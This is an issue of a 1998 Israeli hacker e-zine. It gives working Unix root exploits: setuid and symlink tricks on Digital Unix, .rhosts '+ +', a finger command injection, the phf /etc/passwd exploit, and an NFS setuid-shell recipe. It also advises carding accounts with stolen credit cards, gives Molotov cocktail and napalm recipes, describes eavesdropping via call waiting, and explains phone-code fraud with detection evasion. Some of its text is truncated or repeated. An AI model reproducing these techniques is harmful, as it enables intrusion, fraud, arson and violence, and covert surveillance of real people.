< The Israeli Underground Information eXchage > , � ,g,___.,,�g?P�~ g�,,,. g.,gd$P�''~``'4${ ,, ,,._ __..,, _.,._}$$$$%' '�4$$b, ' g��,.. :} :}"�P#g,. ,yP�~"�4Py. ,gP'~"��"~` '$$$b. ~�4$$4 }$ }$ `$$b: d$} }$b,%%} :$$$% ~$$i _.,, ii��,, `4$%%%?W, ;$$} $$; , .}$$$P g�,,,. .}$$b#P�"}: �$~"�4 `$$b.`4?g,,.,g?P�` ;?W,.,,�g?P�~ ,dP�"' .,._}$$$$%':d$$' $}g4: `$$$b. `~}}~`` `4?~``'4${ '' ,gP'``~"��"~` ,$$P' ii�' .'P�~' ,d$P' '' .d$$' $} ,g, --IL d$$P' '' '~�4` :4g, `�' .,,, {$$$ .. / `�' '?${_.,, `�Pb, jizm#@ '�"~``'4g, `` '' '' Chaos IL - Issue #3, 13/Apr/1998 .. ,, Oi! ~If freedom is outlawed, only outlaws will have freedom~ Oi! Chaos IL Issue Three Index: ~~~~~~~~~~~~~~~~~~~~ ~~~~~~ 01. Introduction to Issue #3 (NEWS) by morpher 02. The Trendline Hack - DIGITAL UNIX V4.0 by Captain Black 03. Hacking the IRIS OS by morpher 04. How to make an improved Incendary Bottle by Molotov 05. Tap into Bezeq's CALL WAITING service by Terminal Man *06. Guide to Bezeq's Extenders and PBXs by TS / Bezeq 07. Stuff you didn't knew about The Analyzer by OXiD 08. Getting around with newbie Hacking by F0X 09. Phun quotes from #chaos-il * 10. Setting your own VMB in Trilog PhoneMail Systems by morpher 11. TeleCards resetting by OXiD 12. Resources & Credits Chaos-IL -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- *** 01. Introduction to Issue #3 ###### ## ## ###### ####### ######## #### ## ## ## ## ## ## ## ## ## ## ## ## ####### ###### ## ## ######## ## ## ## ## ## ## ## ## ## ## ## ## ###### ## ## ## ## ####### ######## #### ######## Issue #3 (c) Chaos-IL Foundation 1998 Note from morpher (morpher@netlimit.com): Welcome to Chaos-IL issue #3! I'm sorry it was a kind of delay until this new issue came out... but if you'll take a brief look on the issue you'll see it was worth waiting :). First time we actually have a special guest directly from Bezeq, who gave us an article that answer all the questions that came up lately about Bezeq's PBXs and Extenders. If you're currently using a PBX or an Extender, or even if you are about to use, please make sure to read this before begining so you'll know the risks :P I've said it once and I'll say it again, if you think you have any kind of interesting, new and original information that you would like to write about, email it to us, and we might include it in the incoming issue. The fact someone writes doesn't means he is a member, he's just another guy who wants to share the information he got in hands. It has been over a month since our last issue release and there have been some major updates going on. Chaos-IL became much bigger then what we ever expected it to be and it's keep getting bigger even, checkout our current member list for more info. Contact info updates: NEW- You may now leave voice messages to Chaos-IL at morpher's VMB: 177-022-3370 (dont bullshit my brain...bahh) UPDATE- Our homepage was re-designed and updated, thanks to Fourth Horseman. http://www.liquid98.com/chaos-il/ IRC CHANNEL- Our IRC channel is now public on the EFnet - #chaos-il morpher. _____________________________________________________________________________ Chaos-IL primary members: morpher morpher@netlimit.com Captain Black capblack@unixgods.com Mr. Freeze mr_freeze@idc.co.il squish Dissection orphaned_land@hotmail.com Easy K_O_C@hotmail.com The Trick trick@mindless.com OXiD transzen@hotmail.com skade Terminal Man terman@hotmail.com MOONCHiLD m00nchild@mosad.org malder sharky@hotmail.com Molotov molotov@hotmail.com Jekyll wwsuicide@hotmail.com The Errormaker Fourth Horseman 4thm@liquid98.com Members can be reached via eMail (also see in article's buttom). Applications, feedbacks, corrections, support, will done at: morpher@netlimit.com How to retrieve Chaos IL ~~~~~~~~~~~~~~~~~~~~~~~~ Chaos IL Issues will be regulary available once released in these fine boards: Liquid Underground +972 (0)3-9067029 Kaos On Compton +972 (0)8-8524603 The Orphaned Land +972 (0)8-9422043 Chaos IL is also regulary in the following anonymous sites: ftp.fc.net /pub/phrack/underground/chaos-il/ ftp.auscert.org.au /pub/emags/chaos_il/ * Israeli sites will be also available soon. You can also: -Join our IRC channel at EFFNet: #chaos-il -Look out the Web at: http://www.liquid98.com/chaos-il/ *** 02. The Trendline Hack - DIGITAL UNIX V4.0 $ THE TRENDLINE HACK $ by Captain Black (c) Chaos-IL Foundation 1998 Trendline Hack Introduction --------------------------- Trendline is an old Internet Service Provider company in the Internet fields of Israel. Different from some of the other ISPs in Israel, Trendline is an Hacker-friendly ISP. Trendline gives us almost everthing possible to: -Hack them (Root them) -Fraud thier accounts billing -Flood them (simply) -Hack thier webpage -Abuse thier IRC users Though all those, I'll be dealing with one thing rightnow: Hacking them, or in other words, gaining root on thier system. Trendline router is used on Digital Unix 4.0 Operating System, which is known as a hell of holed system (pretty stupid to run a router on it). In this article I exampled and described all the operations and high level techniques you may use to gain root on thier system, though its a regular DG/UX 4.0 as the others, Trendline's system has a few holes that are specialized for thier host. -- In order to try/excute all of the below techniques, you must have a trendline account. Trendline accounts are easy to get on the public, or you can card yourself one with a valid full-detailed credit card info. (you might want to take a look at the PPA accounts carding article in Chaos-IL #2) Trendline support number: 03-6388222 (use this to card) After you are equiped' with account, access thier UNIX system through the main host at trendline.co.il , or if you are fimilar with X.28 / X.25 routers you may make your work easier and access them through the escape key ('^]') after you entered username (no password) for ppp mode. /\NOTE/\ I'm writing this article as I'm assuming you are basically fimilar with UNIX, so I wont start detailing every little command and technical step. and YES, I did Hacked Trendline with one of the techniques listed below. *************************************************************************** Local techniques ---------------- The first thing to try is the IFS hole in /usr/sbin/dop. If dop is setuid root, there is a good chance that you can gain root this way. Here is a shell script : ---------------------------------------------------------------------------- #!/bin/sh cat > /tmp/usr <ls -la (Blah Blah Blah.....) -rw-rw-rw- 1 root system 0 Nov xx 15:49 fstab.advfsd.lockfile What the hell to do with it: Before it creates ln -s /.rhosts /tmp/fstab.advfsd.lockfile from here... cat "+ +" > /tmp/fstab.advfsd.lockfile , etc etc. The End - El Fin Colombia 1997. .LoW _ _ |\ | _ |(_`|_' | \|(_)|,_)|_. Efrain 'ET' Torres ---------------------------------------------------------------------------- This if for Digital Unix 3.x (I've never seen it work.) $ ls -l /usr/tcb/bin/dxchpwd -rwsr-xr-x 1 root bin 49152 Jul 25 1995 /usr/tcb/bin/dxchpwd $ ls -l /tmp/dxchpwd.log /tmp/dxchpwd.log not found $ export DISPLAY=:0 (or a remotehost) $ ln -s /hackfile /tmp/dxchpwd $ ls -l /hackfile /hackfile not found $ /usr/tcb/bin/dxchpwd (The dxchpwd window will appear. Just enter root for username and anything for the passwd. You'll get a permission denied message and the window will close.) $ ls -l /hackfile -rw------- 1 root system 0 Nov 16 22:44 /hackfile ---------------------------------------------------------------------------- Remote techniques ----------------- I don't have too much here except one pretty big hole. Digital Unix 4.x is blind ip spoofable!!! So, if you can guess or determine a trust relationship, the machine is yours. Also, when the CERT statd advisory came out, Digital released a patch. I haven't played around with that, but it might be worth looking into. Also, Digital Unix 4.0 sometimes has an 0wned finger daemon, try this.. % finger �/bin/w@host if this gives uptime info etc, it shows the system is vulnerable to this attack, you can specify any command.. simple to use. Captain Black. ____________________________________________________________________________ *** 03. Hacking the IRIS OS /---/---/---/---/---/---/---/---/---/---/---/ Hacking the IRIS/OS /---/---/---/---/---/---/---/---/---/---/---/ by morpher Chaos IL IRIS R9.1.3A Introduction Hello Everybody, Here is some info on a relatively old System called IRIS or Interactive Realtime Information Service. This system was originally meant to run on older systems like PDP-8 and PDP-11. Due to the versatile nature of IRIS, today a lot more systems run it. IRIS systems usually can be reached at 1200 7E1 and after pressing either ESCape or Enter a few times, you should see something like this as a greet: -=- Welcome to "IRIS" R9.1.3A timesharing ! ACCOUNT ID ? -=- Or sometimes it will say what you have reached under the welcome line. IRIS is also extremely hacker-friendly as it will let you type account names for as long as you want. Also when you guess an account there are no passwords on them. At first you will not see what you type, to change this type Control-E to turn the echo on. Try CAPSLOCK also. -=- DEFAULT ACCOUNTS ---------------- MANAGER (Good System Access) NO NAME (Normal User) DEMO (Try the other ones first) PDP8 / PDP11 < == All General Accounts SOFTWARE \ Hopefully you're in there with one of those accounts. Now, then you will get a # prompt. If you are on with an account of access level 3, then you will be able to use a user maintanencer program, by typing either ACCOUNTS or ACCOUNT UTILITY. You should get: -=- (0) EXIT TO SYSTEM (1) ADD NEW ACCOUNT (2) MODIFY ACCOUNT (3) DELETE ACCOUNT (4) INQUIRE ACCOUNT (5) LIST THE ACCOUNTS Ah, I wasn't able to create an account, but I did modify several. Basically this is pretty straight forward. -=- Ok, after you're done playing with the accounts and exit properly there are a lot of interesting features on this IRIS. On one particular system that I use often you have several utilities such as spreadsheets, word processors and even an ASM program. You can get a list of all the things to do by typing LIBR at the # prompt. most of the filenames you type the response will be "NOT A PROCESSOR", Since most of the IRIS software was written is business BASIC. Type BASIC LOAD . Here are some of the most interesting programs. PP or PORT ALL MONITOR will let you see who else is using the system. if for some reason you want to kick off a user, type PPP and then the user name. Also if you want to see your own status type PROT.STAT If you need help with something try typing GUIDE and it will give you a short menu of all the help files available. Too bad there usually isn't many. Another interesting utility to use is BLOCKCOPY, since I am not completely used to it, I will show you what the guide said: INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP TOPIC # FOR INFORMATION ON: 1 BLOCKCOPY THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR. ENTER TOPIC # 1 INTRODUCTORY COMMENTS ON USING BLOCKCOPY PRINT HERE OR $LPT (C/R OR $) : INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY INTRODUCTION BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER. BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY USEFUL IN SPECIAL CASES. EXAMPLES: 1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER, WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE DESTINATION. 2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN BE SET ASIDE AS A DEDICATED SYSTEM BACKUP. 3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED UP TO AND RESTORED FROM OTHER STORAGE MODULES. PRESS RETURN WHEN READY TO GO ON LIMITATIONS NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS. ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK. SETUP FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK. NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE FOR THE BZUD POINTER. ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU. FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER. PRESS RETURN WHEN READY TO GO ON NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED. ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL. ENTER THE FOLLOWING VALUES FOR THE SOURCE: ADDRESS OF THE SOURCE BZUD : 0 COMPUTED VALUE OF SOURCE PHYU : 0 STARTING CYLINDER NUMBER : 0 BLOCK # IN THE CYL TO START COPYING FROM (ORIGIN 0) THIS IS NORMALY ZERO : 0 SOURCE CONTROLLER'S DEVICE CODE : 0 SOURCE DISC'S LRC : 0 NUMBER OF CYLINDERS TO COPY (REM TO GIVE IN OCTAL) : 0 ENTER THE FOLLOWING VALUES FOR THE DESTINATION: ADDRESS OF THE DESTINATION BZUD : 0 COMPUTED VALUE OF DESTINATION PHYU : 0 STARTING CYLINDER : 0 BLOCK # IN THE CYL TO START COPYING TO (ORIGIN 0) : 0 DESTINATION CONTROLLER'S DEVICE CODE : 0 PRINT HERE OR $LPT (C/R OR $) : 0 RUN "MAKEBLOCKCOPY", WHEN FINISHED ENTER THE FOLLOWING COMMAND: #SHUTDOWN [PASSWORD] BLOCKCOPY @73000,X73000 USE DBUG TO SET UP THE FOLLOWING LOCATIONS: 200 : 0 201 : 0 202 : 0 203 : 0 204 : 0 205 : 0 206 : 0 207 : 0 210 : 0 211 : 0 212 : 0 213 : 176346 PRESS RETURN WHEN READY TO GO ON 0 THEN J410 (OR RESET & START AT 410) TO START THE COPY RULES FOR BLOCKCOPY: ADDRESS FUNCTION 400 BAD HALT 401 NOT USED 402 NOT USED 410 START COPY 411 START VERIFY 412 START DISC PATTERN GENERATOR 413 START DISC PATTERN VERIFICATION 414 RETRY CURRENT BLOCK/IF SUCCESSFUL, RESUME-NO LOSS 415 SKIP CURRENT BLOCK/GO TO NEXT BLOCK - BLOCK LOST 416 START INFINITE DISC PATTERN TEST PRESS CR TO CONTINUE DISPLAY OF RULES HALTS: 63077 INDICATES A SUCCESSFUL COMPLETION 63377 WRONG VALUE(S) IN TABLE STARTING AT 200 67077 READ ERROR 73077 WRITE ERROR 63277 VERIFY ERROR IN CORE COMPARE ON READ OR WRITE ERROR, CHECK THE FOLLOWING CELLS: 260 = CURRENT SOURCE RDA 261 = CURRENT DEST RDA 262 = CURRENT DISC STATUS NO AUTOMATIC RETRIES ARE DONE. ON A BAD BLOCK, THERE ARE OPTIONAL RESTARTS AT LOC 414 & 415 (SEE ABOVE) INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP TOPIC # FOR INFORMATION ON: 1 BLOCKCOPY THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR. -=- Also you can edit individual text files and configuration files by text editors. The names of this shit is different on all the systems I've called. -=- CONCULSION I hope this serves a useful purpose.. I still can't understand why IRIS is extremely easy to use, and very common.. yet, I haven't seen any good articles on it in the previous issues of chaos-il. morpher. ================================================================================ 04. How to make an improved Incendary Bottle Chaos-il's NEW Anarchy Division ******************************* Article #1 How to make an improved Incendary Bottle ________________ (aka, Molotov Cocktail) ___________ By: Molotov Incendary Bottles, popularly known as Molotov Cocktails are used to start fires in buildings or as weapons against vehicles or troops. A Molotov Cocktail is nothing more than a glass bottle or jar which has been filled with gasoline and plugged with a gas-soaked rag in the end. When the rag is lit and the bottle is thrown, the gasoline is ignited and spreads a sheet of flame. More effective Molotov Cocktails can be made by using homemade napalm instead of gasoline. For those of you who don't know, napalm is simply gelled gasoline which burns hotter than regular gasolne and clings to whatever it splatters on! Now, on with the napalm... Napalm can be made in several easy ways. The easiest method is to mix 36 parts by volume of gasoline with 1 part of 100-proof alcohol (whiskey or vodka) and 25 parts soap flakes. Only real soap such as Ivory or Palmolive soap bars can be used. Detergent will NOT work. Put the gasoline in a bucket or other container and add the alcohol. Stir the soap flakes in slowly until the gasoline sets in a thick gel. After standing for a few days, the mixture will have the consistency of butter. If necessary, it can be thinned by adding more gasoline. Gasoline can also be gelled with egg whites and any of the following additives: instant coffee, sugar, Epsom salts, baking soda, or salt. To make napalm, place the gasoline in a bucket and add 1 part of egg whites to every 6 parts of gasoline. Slowly add the coffee, sugar or some other suitable material until the gasoline gels to the consistency of jam. This version of napalm breaks down quickly and should be used within 24 hours. Have fun! 05. Tap Bezeq's CALL WAITING service +++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Tap Bezeq's CALL WAIT service + + + +++++++++++++++++++++++++++++++++++++++++++++++++++ + by Terminal Man + +++++++++++++++++++++++++++++++++++++++++++++ ++ Chaos IL ++ So, you have an enemy who talks behind your back, eh? Or, maybe you just would like to "listen" in on your friend's conversations? Well, if you have 2 phone lines and call waiting on one of them, you are in luck. (Only one problem: your friend must also have call waiting!) Procedure: [1] Call up your friend with the phone you want to listen with. When he answers call waiting (he's already on the phone, and you are the 2nd caller), then you either sit there or say: sorry, I have the wrong #. [2] Next, you wait until he goes back to the other line (puts you on hold). [3] Then, pick up your other line and call ->YOUR<- call waiting. [4] Answer call waiting [5] Then go back to him. (Answer, and then click back.. Click ->2<- times answer, and go back..) [6] Hang up your second line [7] You are now on the line! [8] Listen and be Q U I E T ! He can hear you! Techniques I use to prevent noise or confusion: If you have call forwarding, turn it on and forward calls somewhere before you start listening. If a call comes through on your call waiting circuit, the people talking (your buddie and his pal) will not hear anything, but after you answer call waiting and come back, they will hear the other call hang up (two clicks). If you don't have call forwarding, I suggest you get it if you are going to make a habit of this, because it will become a major pain in the ass. When your call waiting rings, you are removed from the "listening" conversation and placed back on his hold circuit. In order to get back on, you must answer the phone and wait for your party when you answer the phone, tell the guy you are in a hurry and you have to go or you'll call him back later or something) to hang up. When he or she hangs up, you will be back on the conversation. Then, one of your pals will say: What was that? (because of the clicks).. So, try to use call forwarding if you can. Remember: Have fun, and don't abuse it. I am not sure about it, because I just discovered it. It is illegal (what isn't these days) because it is invading privacy". I don't know if Bezeq opers just did not realize there was a flaw in it, or that was planned for line testing, I am not sure. Have phun... Terminal Man. _____________________________________________________________________________ 06. Guide to Bezeq's Extenders and PBXs Guide to Extenders and PBXs By: TS (1996 - '98 Bezeq 199 oper) Disclaimer: Don't blame any Chaos-IL members :-) I will probably use a few abbrevations in this, so its would be good to know them. Here they are: PBX: Private Branch eXchange ANI: Automatic Number Identification LD: Long Distance ACN: Area Code and Number IES: Internal Extension System SCC: Specialized Common Carrier ESS: Electronic Switching System CAMA: Centralized Automated Message Acounting A PBX and a extender are not the same thing. They are used as the same word because you can use them to accomplish the same goal: making a free ld or local call. First, I will talk about PBXs in general, and Bezeq's PBXs. A PBX is a baically a few telephone numbers owned by a company. PBXs are present when a company has a IES. An IES is a system in which a person at his desk can dial three numbers to reach another person's desk in the same office. If the person wants to dial outside of their office or building, they must dial 9 then the ACN. I have also seen * and # instead of 9. Some PBXs have dial up lines so the people can work from home. This way, the employees don't have to pay for their business calls. The company gives each employee a certain authorazation code, so they can call the dialup of the PBX, enter their authorazation code, and press 9 (or *,#), then the acn, and their compnay pays for the call. You can tell if you've found a PBX if there is a different ringback. I suppose you'll know if you found one. You can get them by randoming dailing numbers (e.g: make an 177 number scan), or use your social engineering skills. An extender is a service setup by a telephone company. Basically, a extender has the same function as a phone card. You dial the phone number the phone company gives you, enter your authorazation code, and the dial the acn (no 1). Extenders can be found in the 177 NPA or in the 1-800 range. 1-800 numbers are free from your house, but not a pay phone. There a few possible ways to find extenders. You could call the phone company and say you forgot the phone number where I can enter my authorozation code. Another way is to randoming dialing numbers. I would use 177 numbers first. Ways of knowing you found an extender: 1. Get a dialtone after dialing the number. 2. Short beep then silence. 3. Constant tone that stops when you dial something. 4. If you are asked for the code and phone number (kind of obvious) So if you find one of those, then you MAY have found an extender. Number three is most likely an extender. I've never really seen any that aren't. Once you have found an extender, you must find out how many digits are in the code, and if it wants the code or acn first. That's the hard part, I guess you should just play around with it. Listen for tones. Most extenders are 177 numbers, and most 177 numbers are equipped with the ability to trace. Most extenders and PBXs have ANI which means it knows your phone number when you call. PBXs can sometime be found in local areas. Extenders can normally call anywhere to the US and Canada. All the PBXs I work with can call basically anywhere. 1-800 extenders have a nice clear connection, nice for data transfers. I must now explain something about Bezeq, so I can tell you how to secure and not get caught. ESS has the ability to trace calls. ANI is what enables ESS to trace. ESS also has a tape which records information about phone calls. This is called CAMA. It records the number of the caller and receiver, the time of the call, if the reciever answered the phone, and what time the caller hangs up. The tape is used for billing purposes. Normally, 177 numbers and local calls are ignore when it is sent for billing. The billing machines are quite sensitive though. Here is a list of what extenders can detect (from my knoledge, I wouldn't be suprised if this list could be doubled.) 1. Sequenticial Dialing (if you use this, you saying "Bezeq! caught me!" :)) 2. Number of calls coming from a phone number (try to scan during the day, becuase who would make 400 calls at 3:00 a.m.?) 3. Time between calls. (like 5 calls in a minute, or if there is a code failure every couple of minutes.) 4. Time it takes to dial a number. (not many people can dial a phone number in 50 miliseconds.) 5. Amount of time between each number. (not many people can have exactly 1 milisecond between the 8 the 0 and the 0.) 6. (I hear rumors that they have list of Bezeqnet and Internet-zahav numbers, so don't call Bezeqnet and Inet-zahav all the time, makes sense to be true). Basically, what I'm getting at is to use randomnization. I would recommend dialing everything by hand, but that would take to long, so find yourself a good code hacker that has randomnization. I don't really use them, so I don't know of any. Also, if you happen to find some codes, don't go crazy. If you get caught, you probably won't go to court or anything like that. Bezeq will probably just send you a bill. Some people say to distribute you authorozation codes so that Bezeq can't bill all the people using their extenders or PBXs. In a case like this, they would probably bill the persons who used it most or they'll just prolly close the extender. [EOF] I cannot give away my email address or any other personal contact info. you may contact me through Chaos-IL VMB at # 177-022-3370 (please sign your message to "TS") _____________________________________________________________________________ 07. Stuff you didn't knew about The Analyzer ################################### Stuff you didnt knew about... ** The Analyzer ** ################################### by OXiD (c) Chaos-IL Foundation 1998 The analyer as most knows is one of the greatest computers hackers in the world, he hacked so many boxes but only harmed natzi and kids porn sites. The analyzer has already hacked heavy secured servers around the globe when The Pentagon is one of them (not many know but the usa missile center was hacked by the analyzer by a mistake, he didn't know he was hacking a missile center box, he was sure he's hacking another .gov box). The analyzer has started hacking since he was 13 years old when he started his own hacking programs which he's been using until today with improvements of course. The analyzer began hacking boards, and was working with the sysop of the legendary Aquarious BBS. Since then he's hacked quite a few shells , not only to see if he can face the challange like he's usually done but to get back in natzies and in other people who's got into a fight with him.he's gained ircop priviliges a couple of times during fights in natzi channels and even after he's told the box administrators about the holes he continued controlling their systems. The analyzer was caught after that fbi agents have already captured the wrong people a couple of times , like a poor surfer in Hawaii, 2 guys from the us whom analyzer had taught his tricks and a couple of analyzer's friends, after those busts he's published his name in the internet in order to save his friends. The analyzer wasn't allowed to leave his house for 10 days , and obviously not to touch a computer since his was taken away by the police. Right now as you're reading this , the analyzer awaits his sentence which will probably be a fine. OXiD Chaos-IL _____________________________________________________________________________ 08. Getting around with newbie Hacking Getting around with newbie Hacking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by F0x In the following text i will give you a step through how to get started with hacking guide. and a little FAQ.. FAQ: can some1 hack into my Windows95? no! unless yer using Explorer 3.00 which has a bug which was fixed....in any version available currently. i don't think any1 will have ie 3.00... how can i hack irc??? there is no such thing as HACKING IRC! if you ask that question you will get kicked from any normal hacking channel. what can i hack then? computers which are ment for mass use(use for more then one person)... if you are smart enough to hack you will understand y... Now let's begin, to be a little more specific, the most easiest system to hack is unix, because it's main perpose is to serve more than one user at the same time, and we know lot's of bugs for it.. if you wanna learn unix hacking i can give you detailed process: 1. Hate Microsoft & Windows 95 in particular 2. Get Linux 3. Install Linux(don't ask some1 to install it for ya.. if you can't install it yerself, using non-direct help don't even start hacking) 4. Maintain Your Linux / Make Linux yer primary OS **********You're almost there*********** 5. Get Exploits ( to get good ones is the hard part! ) What is a passwd file? and what can you learn from it? a passwd file is a file called passwd and it's full path on any unix system is /etc/passwd. A passwd file contains all the users , and their passwords in one way encrypted format. it's full format is user:encrypted-pass:userid:usergroupid:full-name:/home/path:/bin/shell -- I will use this info l8r. PHF --- Phf is a program ment to test other programs and return their stats and enverionmental variables. however, it can be manipulated and all you need is just to give this a thought: it tests ==> it runs the programs ==> you can run any program even cat /etc/passwd (cat command is like "type" in dos) ==> you can get the user list and their encrypted passwords. why is this useful? because phf runs from the web server and this should be it's full path: http://www.notmaintained.edu/cgi-bin/phf so this means we can execute that command remotely. Now all we need to know is how to crack those encrypted passwords and we're done. This is why we have passwd crackers such as "John The Ripper" or "Cracker Jack" which are the best (i preffer john, you can net search for these programs anywhere). Anyhow using phf isn't tough, you can use my phfcommand.c or phfscan.c available at . Now i will show the exploit line: www.trying.edu/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd and that's it.(put this line on any browser(of course lynx is preffered - and guess y?... because it has nothing to do with microsoft. For the advanced.......... MOUNT ^^^^^ apparently not every1 knows what this means...in order to use bug you need to at least own or 0wn one unix box(0wn = own by haxing) <== you already have root. what you need to do is showmount -e host , this may sometimes give u a list of directories, some may be users directories so all you have to do is mount. in order to mount you need to type(as root) mount -t nfs remote:/directory /local/dir or mount -F nfs remote:/directory /local/dir (the directory must exist) Mount with rw, and then put in a users home directory a .rhosts with a line containing "+ +" and then rlogin with that user then hacking the system is even easier, make a file called test.c containing the following line: main(){setuid(0);setgid(0);system("/bin/sh")} you can replace sh by your favorite available sh. now compile it: cc test.c -o test Now, if you have mounted it with "rw" succesfully then you can now chown it to root then chmod u+s test and you've hacked it!! (c) CHAOS-IL 1998 _____________________________________________________________________________ 09. Phun qoutes from #chaos-il -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- That was a phunny chat about some guy who didn't knew ACTVNET switched prices since thier first offer (4 months :)) Read carefully and you might also learn some shit about Linux ppp scripting.. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- yo yo yo came for a sec.. yo 'sup? ok hmm.. still have ppp connection prob'z i will try now some other method to connect squish wasn't able to help me so much you voiced with him? huh? yeah your linux is fucked,its not my problem [squish]: just said, u couldn't help me so much.. i installed linux today, and in my FIRST try it worked it ain't fucked and i installed it too.. and it didn't work eheh don't blame me u were the one who said he knows how to fix it squish is a leeeeeeeeeeeeeeet BSD geezer , he dont bother giving advise to use lame LINUX users :) for payment he will BitchX-74p1+ by panasync - Linux 2.0.33 Br2: if squish didnt fixed your linux... then NO ONE can :) i installed linux today :) and it worked on the FIRST time [d2-rN^_]: i give him payment 'sup? ok hmm.. still have ppp connection prob'z i will try now some other method to connect squish wasn't able to help me so much you voiced with him? huh? yeah your linux is fucked,its not my problem [squish]: just said, u couldn't help me so much.. i installed linux today, and in my FIRST try it worked it ain't fucked and i installed it too.. and it didn't work don't blame me eheh Br2 : i do i know how to connect via liunx yeah but it doesn't work u were the one who said he knows how to fix it squish is a leeeeeeeeeeeeeeet BSD geezer , he dont bother giving advise to use lame LINUX users :) for payment he will BitchX-74p1+ by panasync - Linux 2.0.33 i installed linux today Br2: if squish didnt fixed your linux... then NO ONE can :) :) and it worked on the FIRST time [d2-rN^_]: i give him payment Br2 : i do i know how to connect via liunx yeah i know how to connect to.. i even gave him my kernel :) but didn't work but it doesn't work heh i know how to connect to.. i even gave him my kernel :) but didn't work squish - can ya dcc me bitchX? heh i will now try other method squish, why u gone back 2 LINUX ? i will now try other method bitchx binary for linux? just to help me [d2-rN^_]: just to help me squish - yes.. d2-rN^_ : for all the programs i must use them heh ok .. onme se c Br2, whats your problem wiv it ? u mean what's my ppp prob? yep welp.. i tried connecting in many ways bitchx binary for linux? just to help me [d2-rN^_]: just to help me squish - yes.. d2-rN^_ : for all the programs i must use them heh ok .. onme se c Br2, whats your problem wiv it ? u mean what's my ppp prob? yep welp.. i tried connecting in many ways i dont get yar prob man just get a cool ppp script and thats all with 'dip' .. after doing 'mode ppp' it just hangs-up *** Joins: BiT (blah@ts002p4.pop6a.netvision.net.il) dip?! nonononononon ugly Br2: u'w using INET GOld? squish: told me.. u may need a script u may need a script [m0ta_boy]: yes i do have a script mode ppp ? u mean pppd ? *** Quits: Emaker (bbl..) ppp-up dip works fine [d2-rN^_]: no i mean mode ppp - squish told me d2: ugly??? ITS THE EASYES THING TO USE IT U'R ISP CAN SUPPORT IT DIP RULEZ DIP RULEZ :) i got ppp-up, i tryed and i connected to the net BUT *** m0ta_boy is now known as dip_now i couldn't use any commands [morpher]: i have one but m0ta: no it aint mate :) seriously , it took me 2 months to figure out dip . and 1 hour to figure out pppd i can't use the commands of the ppp like telnet/ftp/etc... didn't work *** dip_now is now known as m0ta_boy like ignoring me ... keep thinking ping d2: 2 months to figure out dip??? for god's sake.. only works when i ping my local ip i got from the isp hmm hmm yeah hmm d2: i didn't figure out anything. 'mode ppp' worked on first try m0ta_boy, the fucking thing just didnt want 2 work hey morpher hmm what does "ifconfig -a" gives you when you're connected? your friend his here ! give even easy hehhe is *** Quits: mohawk_ (Ping timeout: 180 seconds) :) [squish]: u'r talking to me? yes [morpher]: i'm morpher's friend try to conncet i can't needa reboot first i just mailed some ppl who knows linux well, some ppp-howto writers :) *** Parts: Lehavoth (~Lehavoth@I-CENTRAL.COM) welp i needa go you're telling morpher you're morpher's friend? Br2: i alreay said, CALL THEM : i'll be back ) *** Joins: Lehavoth (~Lehavoth@I-CENTRAL.COM) Br2: i alreay said, CALL THEM ASK IF THEY GOT A SCRIPT FOR UNIX/LINUX USERS m0ta_boy, i got pppd connect 'chat -v "" ATDT01816612521 